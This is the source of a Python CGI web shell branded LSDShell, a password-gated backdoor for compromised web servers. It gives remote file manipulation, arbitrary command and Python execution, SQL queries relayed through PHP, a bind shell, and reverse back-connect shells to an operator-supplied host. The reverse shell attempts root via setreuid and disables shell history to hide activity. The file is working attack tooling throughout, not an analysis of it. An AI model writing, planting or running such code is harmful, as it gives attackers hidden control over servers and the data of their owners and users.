#!/usr/bin/python import sys, os, cgi, commands, time, Cookie, socket, pty,select from base64 import b64encode from stat import * from datetime import datetime sys.stderr = open(os.devnull, 'w') password = "27db7898211c8ccbeb4d5a97d198839a" # r00t version = "0.5 [PRIV9]" esc = '%s['%chr(27) color = esc + "1;36m" reset = esc + "0m" # don't ask why i did it this way, ''' doesnt agree with pty's ascii = color################################################################################ ascii +=' @@@@@@@ @@@ @@@ @@@ @@@@@@@ @@@@@@@ @@@ @@@ @@@ @@@@@@ @@@@@@ @@@@@@@ \r\n'# ascii +=' !@@ @@! @@@ @@! @@! @@@ @@! @@@ @@! !@@ @@@ @@! @@! @@!\r\n'# ascii +=' !@! @!@!@!@! !!@ @!@@!@! @!@@!@! !@!@! !@! @!!!: @!!!: @!! \r\n'# ascii +=' :!! !!: !!! !!: !!: !!: !!: !!! !!: !!: .!!: \r\n'# ascii +=' :: :: : : : : : : : .: : ::: :: ::: :: : : \r\n'# ascii +=' ~[ P R I V 8 C O N N E C T B A C K S H E L L ]~ \r\n'# ascii += reset############################################################################### def getall(theform, nolist = False): data = {} for field in theform.keys(): if type(theform[field]) == type([]): if not nolist: data[field] = theform.getlist(field) else: data[field] = theform.getfirst(field) elif theform[field].filename: _FILES[field] = theform[field] else: data[field] = theform[field].value return data def escape(str): return str.replace("'", "\\'").replace("\r", "\\r").replace("\n", "\\n") _FILES = {} _REQUEST = getall( cgi.FieldStorage() ) if _REQUEST.has_key('charset') == False: _REQUEST['charset'] = "Windows-1251" if _REQUEST.has_key('a') == False: _REQUEST['a'] = "files" if _REQUEST.has_key('c') == False: _REQUEST['c'] = os.getcwd() if _REQUEST.has_key('p1') == False: _REQUEST['p1'] = "" if _REQUEST.has_key('p2') == False: _REQUEST['p2'] = "" if _REQUEST.has_key('p3') == False: _REQUEST['p3'] = "" _COOKIE = Cookie.SimpleCookie() try: _COOKIE.load(os.environ["HTTP_COOKIE"]) except: pass def printLogin(): _COOKIE['psswd'] = ""; print _COOKIE; print "Content-type: text/html\n"; print """
Password:
""" exit() if _COOKIE.has_key('psswd') and len(_COOKIE['psswd'].value) > 0 : if _COOKIE['psswd'].value != password: printLogin() elif _REQUEST.has_key('psswd'): try: import hashlib psswd = hashlib.md5() except: import md5 psswd = md5.new() psswd.update(_REQUEST['psswd']) if psswd.hexdigest() != password: printLogin() else: _COOKIE['psswd'] = psswd.hexdigest() else: printLogin() print _COOKIE home_dir = os.getcwd() try: os.chdir(_REQUEST['c']) except os.error, msg: pass cwd = os.getcwd(); if cwd[-1] != '/': cwd += '/' def printHeader(): print "Content-type: text/html\n"; print "" + os.environ["SERVER_NAME"] + " - LSDShell " + version + """
""" print '' print '
Uname:
User:
Time:
Cwd:		' for x in os.uname(): sys.stdout.write(x+' ') t = time.localtime() print '
%s
%d-%.2d-%.2d %.2d:%.2d:%.2d Server IP: %s Client IP: %s
' %( commands.getoutput( 'id' ).replace("root", "root"), t[0], t[1], t[2], t[3], t[4], t[5], os.environ['SERVER_ADDR'], os.environ['REMOTE_ADDR']) path = '' paths = cwd.split('/') paths.pop() for x in paths: path += x + '/' sys.stdout.write(""""""+x+"""/""") print " " + permsColor(cwd),"""[ home ]""" charsets = ['UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'] print '
Currently logged in: '+commands.getoutput('users')+'
' for x in ['Files', 'Console', 'Python', 'Network', 'SQL']: print "' print '
[ '+x+' ]
' def printFooter(): if os.access (cwd, os.W_OK): writable = "[ Writeable ]" else: writable = "[ Not writable ]" print """
Change dir:
Read file:
Make dir:
"""+writable+"""
Make file:
"""+writable+"""
Execute:
Upload file:
"""+writable+"""
""" def viewSize(s): if s >= 1073741824: return "%1.2f GB" % (s / 1073741824.0); elif s >= 1048576: return "%1.2f MB" % (s / 1048576.0); elif s >= 1024: return "%1.2f KB" % (s / 1024.0); else: return str(s) + ' B'; def perms(p): mode = os.lstat(p)[ST_MODE] p = mode i=""; if (p & 0xC000) == 0xC000: i = 's' elif (p & 0xA000) == 0xA000: i = 'l' elif (p & 0x8000) == 0x8000: i = '-' elif (p & 0x6000) == 0x6000: i = 'b' elif (p & 0x4000) == 0x4000: i = 'd' elif (p & 0x2000) == 0x2000: i = 'c' elif (p & 0x1000) == 0x1000: i = 'p' else: i = 'u' if p & 0x0100: i += 'r' else: i += '-' if p & 0x0080: i += 'w' else: i += '-' if p & 0x0040: if p & 0x0800: i += 's' else: i += 'x' else: if p & 0x0800: i += 'S' else: i+='-' if p & 0x0020: i += 'r' else: i += '-' if p & 0x0010: i += 'w' else: i += '-' if p & 0x0008: if p & 0x0400: i += 's' else: i += 'x' else: if p & 0x0400: i += 'S' else: i += '-' if p & 0x0004: i += 'r' else: i += '-' if p & 0x0002: i += 'w' else: i += '-' if p & 0x0001: if p & 0x0200: i += 't' else: i += 'x' else: if p & 0x0200: i += 'T' else: i += '-' return i; def permsColor(path): if not os.access (path, os.R_OK): return ""+perms(path)+"" elif os.access (path, os.W_OK): return ""+perms(path)+"" else: return ""+perms(path)+"" def actionConsole(): printHeader() print "

Console

" print """
$
' print "
" printFooter() def actionFiles(): printHeader() if _REQUEST['p1'] == 'uploadFile': try: if _FILES['f'].filename: fn = os.path.basename(_FILES['f'].filename) open(fn, 'wb').write(_FILES['f'].file.read()) except: pass if _REQUEST['p1'] == 'mkdir': try: os.mkdir(_REQUEST['p2']) except: pass print "

File manager

" item_stat = os.lstat('..') def dirItemInfo(name, item_stat): if S_ISLNK(item_stat[ST_MODE]): type = "link" else: type = "dir" tmp = { 'name' : name, 'path' : os.path.join(cwd, name), 'size' : viewSize(item_stat[ST_SIZE]), 'mtime' : datetime.fromtimestamp(item_stat[ST_MTIME]).strftime("%Y-%m-%d %H:%M:%S"), 'uid' : str(item_stat[ST_UID]), 'gid' : str(item_stat[ST_GID]), 'perms' : permsColor(name), 'type' : type } return tmp dirs = [dirItemInfo('..', os.lstat('..'))] files = [] for item in os.listdir(cwd): item_stat = os.lstat(item) mode = item_stat[ST_MODE] tmp = dirItemInfo(item, item_stat) if S_ISLNK(mode) or S_ISDIR(mode): dirs.append(tmp) elif S_ISREG(mode): files.append(tmp) print "" print """"""; def sort(a, b): return cmp(a['name'].lower(), b['name'].lower()) line = 0 for item in sorted(dirs, sort): print "" print "" line = (line + 1)%2 for item in sorted(files, sort): print "" print "" line = (line + 1)%2 print "
NameSizeModifyOwner/GroupPermissionsActions
[ "+cgi.escape(item['name'])+" ]"+item['type']+""+item['mtime']+""+item['uid']+"/"+item['gid']+""+item['perms']+"R T
"+cgi.escape(item['name'])+""+item['size']+""+item['mtime']+""+item['uid']+"/"+item['gid']+""+item['perms']+"R T E D
" printFooter() def actionFileTools(): if _REQUEST['p2'] == "": _REQUEST['p2'] = "view" if _REQUEST['p2'] == "download": print "Content-Disposition: attachment; filename=" + os.path.basename(_REQUEST['p1']) + "\n" try: fp = open(_REQUEST['p1'], 'rb') for x in fp.readlines(): sys.stdout.write(x) fp.close() except: pass return if _REQUEST['p2'] == "save": try: fp = open(_REQUEST['p1'], 'w') fp.write(_REQUEST['p3']) fp.close() except: pass _REQUEST['p2'] = 'edit' printHeader() print "

File tools

" item_stat = os.stat(_REQUEST['p1']) print "File: " + os.path.basename(_REQUEST['p1']) + " Size: " +viewSize(item_stat[ST_SIZE]) + " Permission: " +permsColor(_REQUEST['p1']) print "
" if S_ISDIR(item_stat[ST_MODE]): menu = ['Chmod', 'Rename', 'Touch'] else: menu = ['View', 'Download', 'Edit', 'Chmod', 'Rename', 'Touch'] for x in menu: print "" if x.lower() == _REQUEST['p2']: print "[ " + x + " ]" else: print x print " " print "

"; if _REQUEST['p2'] == "view": try: fp = open(_REQUEST['p1'], 'r') print "
"
            for x in fp.readlines():
                sys.stdout.write(cgi.escape(x))
            fp.close()
            print "
" except: print "Can't open file! "+_REQUEST['p1'] if _REQUEST['p2'] == "edit": try: fp = open(_REQUEST['p1'], 'r') print "
" except: print "Can't open (create) file! "+_REQUEST['p1'] if _REQUEST['p2'] == "chmod": import stat, string if len(_REQUEST['p3']): perm = string.atoi(_REQUEST['p3'], 8) try: os.chmod(_REQUEST['p1'], perm) print "Done" except: print "Fail!" print "
" if _REQUEST['p2'] == "rename": if len(_REQUEST['p3']): try: os.rename(_REQUEST['p1'], _REQUEST['p3']) _REQUEST['p1'] = _REQUEST['p3'] print "Done" except: print "Fail!" print "
" if _REQUEST['p2'] == "touch": if len(_REQUEST['p3']): try: tmstmp = time.mktime(time.strptime(_REQUEST['p3'], "%Y-%m-%d %H:%M:%S")) os.utime(_REQUEST['p1'], (tmstmp, tmstmp)) item_stat = os.stat(_REQUEST['p1']) print "Done" except: print "Fail!" print "
" print "
" printFooter() def actionPython(): printHeader() print "

Exec python code

" print """
' if len(_REQUEST['p1']) > 0: print '
'
        try:
            import StringIO
            old_stdout = sys.stdout
            sys.stdout = StringIO.StringIO()
            exec(_REQUEST['p1'])
            data = sys.stdout.getvalue()
            sys.stdout = old_stdout
            print cgi.escape(data)
        except:
            pass
        print '
' print "
" printFooter() def actionSQL(): printHeader() thephp = ''' $user = "LOLUSERFUCK";$password = "LOLPASSFUCK"; $host = "LOLHOSTFUCK"; $db = "LOLDBFUCK"; mysql_connect($host,$user,$password); $query = "LOLQUERYFUCK"; mysql_select_db($db); $result = mysql_query($query); while($row = mysql_fetch_array($result, MYSQL_NUM)) { for($i = 0;$i';} } ''' if _REQUEST.has_key('db'): print """

SQL

Run SQL
Host: Database: User: Pass: Query:

""" else: print """

SQL

Run SQL
Host: Database: User: Pass: Query:

""" if _REQUEST.has_key('db'): thephp = thephp.replace("LOLUSERFUCK", _REQUEST['user']).replace("LOLPASSFUCK", _REQUEST['pass']).replace("LOLQUERYFUCK", _REQUEST['query']).replace("LOLDBFUCK", _REQUEST['db']).replace("LOLHOSTFUCK", _REQUEST['host']) thephp = b64encode(thephp) # cause fuck escaping shit thephp = '\"%s\"' % thephp print commands.getoutput("echo '' | php").replace("\n","
") printFooter() def actionNetwork(): printHeader() if _REQUEST['p1'] != "": sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) if _REQUEST['p1'] == "bp": try: sock.bind(('localhost', int(_REQUEST['p2']))) sock.listen(0) except: print "error" else: print "done" if os.fork()!=0: (c,addr)=sock.accept() os.dup2(c.fileno(), 0) os.dup2(c.fileno(), 1) os.dup2(c.fileno(), 2) os.system('/bin/sh -i') c.shutdown(2) sock.shutdown(2) elif _REQUEST['p1'] == "bc": try: sock.connect( (_REQUEST['p2'], int(_REQUEST['p3'])) ) except: print "error" else: print "done" if os.fork()!=0: os.dup2(sock.fileno(), 0) os.dup2(sock.fileno(), 1) os.dup2(sock.fileno(), 2) os.system('/bin/bash -i') sock.shutdown(2) elif _REQUEST['p1'] == "cc": try: sock.connect( (_REQUEST['p2'], int(_REQUEST['p3'])) ) except: print "error" else: print "done" try: os.setreuid(0,0) except: pass uname = commands.getoutput("uname -a") id = commands.getoutput("id") pid, childProcess = pty.fork() if pid == 0: sock.send(ascii) sock.send(uname+"\r\n"+id+"\r\n") os.putenv("HISTFILE","/dev/null") os.putenv("HOME",os.getcwd()) os.putenv("PATH",'/usr/local/sbin:/usr/sbin:/sbin:'+os.getenv('PATH')) os.putenv("TERM",'linux') os.putenv("PS1",color+'''\u@\h:\w\$ '''+reset) pty.spawn("/bin/bash") sock.send("\r\n") sock.shutdown(1) else: b = sock.makefile(os.O_RDONLY|os.O_NONBLOCK) c = os.fdopen(childProcess,'r+') y = {b:c,c:b} try: while True: for n in select.select([b,c],[],[])[0]: z = os.read(n.fileno(),4096) y[n].write(z) y[n].flush() except: pass print """

Network tools

Bind port to /bin/sh
Port:
Back-connect shell:
Server: Port:
Chippy1337 enhanced back-connect shell (requires socat):
Server: Port:

""" printFooter() def actionDDOS(): printHeader() if _REQUEST['p1'] != "": sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) if _REQUEST['p1'] == "bp": try: sock.bind(('localhost', int(_REQUEST['p2']))) sock.listen(0) except: print "error" else: print "done" if os.fork()!=0: (c,addr)=sock.accept() os.dup2(c.fileno(), 0) os.dup2(c.fileno(), 1) os.dup2(c.fileno(), 2) os.system('/bin/sh -i') c.shutdown(2) sock.shutdown(2) elif _REQUEST['p1'] == "bc": try: sock.connect( (_REQUEST['p2'], int(_REQUEST['p3'])) ) except: print "error" else: print "done" if os.fork()!=0: os.dup2(sock.fileno(), 0) os.dup2(sock.fileno(), 1) os.dup2(sock.fileno(), 2) os.system('/bin/bash -i') sock.shutdown(2) elif _REQUEST['p1'] == "cc": try: sock.connect( (_REQUEST['p2'], int(_REQUEST['p3'])) ) except: print "error" else: print "done" try: os.setreuid(0,0) except: pass uname = commands.getoutput("uname -a") id = commands.getoutput("id") pid, childProcess = pty.fork() if pid == 0: sock.send(ascii) sock.send(uname+"\r\n"+id+"\r\n") os.putenv("HISTFILE","/dev/null") os.putenv("HOME",os.getcwd()) os.putenv("PATH",'/usr/local/sbin:/usr/sbin:/sbin:'+os.getenv('PATH')) os.putenv("TERM",'linux') os.putenv("PS1",color+'''\u@\h:\w\$ '''+reset) pty.spawn("/bin/bash") sock.send("\r\n") sock.shutdown(1) else: b = sock.makefile(os.O_RDONLY|os.O_NONBLOCK) c = os.fdopen(childProcess,'r+') y = {b:c,c:b} try: while True: for n in select.select([b,c],[],[])[0]: z = os.read(n.fileno(),4096) y[n].write(z) y[n].flush() except: pass print """

Network tools

Bind port to /bin/sh
Port:
Back-connect shell:
Server: Port:
Chippy1337 enhanced back-connect shell (requires socat):
Server: Port:

""" printFooter() try: { 'files' : actionFiles, 'fileTools' : actionFileTools, 'console' : actionConsole, 'python' : actionPython, 'network' : actionNetwork, 'sql' : actionSQL, 'ddos' : actionDDOS }[_REQUEST['a']]() except KeyError: printHeader() printFooter()